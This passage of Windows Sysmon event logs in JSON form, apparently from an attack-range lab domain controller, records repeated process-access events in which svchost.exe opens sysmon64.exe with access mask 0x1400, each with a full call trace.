C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.371","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1563,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.371\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.371","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1564,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.371\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.371","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1565,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.371\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.371","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1566,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.372\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.372","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1567,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.372\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.372","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1568,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.372\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.372","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1569,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.372\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.372","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1570,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.375\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 